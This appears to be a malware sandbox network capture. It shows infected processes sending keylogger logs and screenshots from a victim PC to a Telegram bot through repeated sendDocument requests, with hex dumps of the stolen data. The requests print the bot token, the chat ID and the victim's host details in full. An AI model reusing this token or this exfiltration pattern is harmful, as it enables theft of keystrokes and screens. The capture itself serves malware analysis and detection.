2024-12-03 13:29:09 UTC	555	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 568 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:29:09 UTC	568	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 5a 62 43 79 56 52 4a 4b 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 35 39 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 35 39 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 39 3a 30 30 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataZbCyVRJK.txt"Content-Type: application/octet-stream[08:28:59]<<Program Manager>>[08:28:59]<<Program Manager>>[08:29:00]<<Program Mana
2024-12-03 13:29:10 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:29:10 GMT Content-Type: application/json Content-Length: 546 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:29:10 UTC	546	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 39 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 35 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44 Data Ascii: {"ok":true,"result":{"message_id":3908,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232550,"document":{"file_name":"KeyD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49953	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:29:11 UTC	555	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 568 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:29:11 UTC	568	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 63 70 76 51 67 48 5a 4c 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 38 3a 32 39 3a 30 30 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 39 3a 30 30 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 39 3a 30 30 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDatacpvQgHZL.txt"Content-Type: application/octet-stream[08:29:00]<<Program Manager>>[08:29:00]<<Program Manager>>[08:29:00]<<Program Mana
2024-12-03 13:29:11 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:29:11 GMT Content-Type: application/json Content-Length: 547 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:29:11 UTC	547	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 39 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 35 35 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44 Data Ascii: {"ok":true,"result":{"message_id":3909,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232551,"document":{"file_name":"KeyD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49959	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:29:13 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:29:13 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 4e 49 77 59 76 55 6c 42 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotNIwYvUlB.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
2024-12-03 13:29:13 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:29:13 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:29:13 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:29:13 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:29:13 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:29:13 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:29:13 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:29:13 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:29:13 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:29:17 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:29:17 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49962	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:29:15 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:29:15 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 51 56 73 68 66 6d 50 4d 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotQVshfmPM.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
2024-12-03 13:29:15 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:29:15 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
